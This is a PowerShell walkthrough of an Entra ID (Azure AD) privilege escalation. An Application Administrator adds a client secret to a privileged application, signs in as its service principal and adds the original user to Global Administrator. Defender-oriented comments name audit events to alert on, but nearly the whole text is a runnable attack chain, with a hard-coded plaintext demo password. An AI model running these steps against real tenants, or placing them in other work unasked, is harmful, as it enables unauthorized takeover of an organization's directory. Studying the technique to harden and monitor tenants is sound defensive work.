# ---------------------------------------------------------------------------
# Entra ID (Azure AD) walkthrough: Application Administrator -> Global Administrator.
#
# Sequence as written below:
#   1. Sign in with a user password (hard-coded in this demo).
#   2. Enumerate every directory role and its members into $userRoles.
#   3. Look up a target application, its owners and the Global Administrator role members.
#   4. Add a new password credential (client secret) to the target application.
#   5. Sign in as that application's service principal and add the original
#      user to the Global Administrator role.
#
# Why this matters for defenders: any identity that can add credentials to an
# application (Application Administrator, Cloud Application Administrator,
# application owners) effectively inherits every directory role the
# application's service principal holds. Avoid assigning privileged directory
# roles to service principals, treat app-credential management rights as
# tier-0 wherever the app is privileged, and alert on audit-log activities such
# as "Update application - Certificates and secrets management" and
# "Add member to role".
#
# Prerequisites: the AzureAD and Az PowerShell modules (the AzureAD module and
# the Azure AD Graph endpoint it relies on are deprecated by Microsoft), a value
# for $tenantId (never assigned in this script) and a real value for
# $targetAppOid.
# ---------------------------------------------------------------------------

# Authenticate to Azure AD as an Application Administrator user
$username = "alice" # Username for authentication (demo value)
$password = "asdf" # Password for authentication -- plaintext secret in source; in real use read it from a prompt or a secret store
# Convert password to a secure string
$securePass = ConvertTo-SecureString "$password" -AsPlainText -Force
# Create a credential object
$cred = New-Object System.Management.Automation.PSCredential($username, $securePass)
# Connect to Azure AD with the provided credentials
Connect-AzureAd -Credential $cred

# Fetch and display roles and their members
# Create an array to hold user role information (one PSCustomObject per role/member pair)
$userRoles = @()
# Fetch all directory roles
Get-AzureADDirectoryRole | ForEach-Object {
    $Role = $_ # Current role
    # Fetch all members of the current role
    $RoleMembers = Get-AzureADDirectoryRoleMember -ObjectID $Role.ObjectId
    ForEach ($Member in $RoleMembers) {
        # Create custom object to hold role and member info
        $RoleMembership = [PSCustomObject]@{
            MemberName = $Member.DisplayName
            MemberID = $Member.ObjectId
            MemberOnPremID = $Member.OnPremisesSecurityIdentifier
            MemberUPN = $Member.UserPrincipalName
            MemberType = $Member.ObjectType
            RoleID = $Role.RoleTemplateId
        }
        # Add this object to the userRoles array
        $userRoles += $RoleMembership
    }
}

# Fetch a specific user by userPrincipalName
# NOTE: the address in the filter looks like a redacted placeholder from the page rendering; substitute a real UPN
Get-AzureADUser -Filter "userPrincipalName eq '[email protected]'"
# Filter roles by a specific Member ID
# NOTE: -match is a regular-expression (substring) test, not an exact comparison; an exact match would use -eq
$userRoles | Where-Object {$_.MemberID -match 'a29ddc45-1520-4b0a-b376-48a89e4f4d38'}

# Fetch Application Administrator role details
# NOTE(review): $AppAdminOid is not referenced again anywhere in this script
$AppAdminOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Application Administrator'} | Select-Object -ExpandProperty ObjectId
# Your target application's object ID should be set here
$targetAppOid = "<Your Target Application's Object ID>"
# Fetch the owners of the target application
Get-AzureADApplicationOwner -ObjectId $targetAppOid
# Fetch roles for the target application (same substring -match caveat as above)
$userRoles | Where-Object {$_.MemberID -match $targetAppOid}

# Fetch Global Administrator role object ID
$ServicePrincipalAdRoleOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Global Administrator'} | Select-Object -ExpandProperty ObjectId
# Fetch members of Global Administrator role
Get-AzureADDirectoryRoleMember -ObjectId $ServicePrincipalAdRoleOid | Select-Object ObjectId, DisplayName

# Create and retrieve a new secret for the target application
# This is the pivotal step: a credential is added to an application that (per the
# comments below) holds a privileged role. It is written to the Entra audit log and
# is the event defenders should alert on.
$AppKeyCred = New-AzureADApplicationPasswordCredential -ObjectId $targetAppOid
$AppKeyCred.Value # prints the new secret to the console (and into any transcript or history)
# Disconnect from Azure AD
Disconnect-AzureAd

# Variables for GA Service Principal authentication (Please set $tenantId -- it is never assigned in this script)
$azureApplicationId = $targetAppOid
# NOTE(review): the same GUID is used as -ObjectId above and as the sign-in identity here;
# the comment at the top calls it an object ID -- confirm it is the intended identifier for both uses
$azureTenantId = $tenantId
$azurePassword = ConvertTo-SecureString $AppKeyCred.Value -AsPlainText -Force
$psCred = New-Object System.Management.Automation.PSCredential($azureApplicationId, $azurePassword)
# Connect to Azure with service principal credentials
Connect-AzAccount -Credential $psCred -TenantId $azureTenantId -ServicePrincipal

# Fetch authentication token for further operations
# The token is requested for the legacy Azure AD Graph resource (https://graph.windows.net),
# which Microsoft has deprecated; this step may stop working as that endpoint is retired.
$context = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile.DefaultContext
$aadToken = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.Id.ToString(), $null, [Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, $null, "https://graph.windows.net").AccessToken
# Connect to Azure AD using the obtained token
Connect-AzureAd -AadAccessToken $aadToken -AccountId $context.Account.Id -TenantId $context.Tenant.Id

# List Azure AD users
Get-AzureADUser
# Fetch Global Administrator role's object ID
$GaRoleOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Global Administrator'} | Select-Object -ExpandProperty ObjectId
# Fetch members of the Global Administrator role
Get-AzureADDirectoryRoleMember -ObjectId $GaRoleOid | Select-Object ObjectId, DisplayName

# Fetch a specific user by DisplayName (alice in this case)
# NOTE: DisplayName is not guaranteed unique; if several users match, $aliceOid holds more
# than one ID. A UserPrincipalName filter (as used earlier) identifies the account unambiguously.
$aliceOid = (Get-AzureADUser | Where-Object {$_.DisplayName -eq 'alice'}).ObjectId
# Add the user to the Global Administrator role
# Final step of the chain: the session now runs as the application's service principal,
# which the script's comments indicate holds Global Administrator, and it grants that
# role to the original user. This membership change is also an auditable event.
Add-AzureADDirectoryRoleMember -RefObjectId $aliceOid -ObjectId $GaRoleOid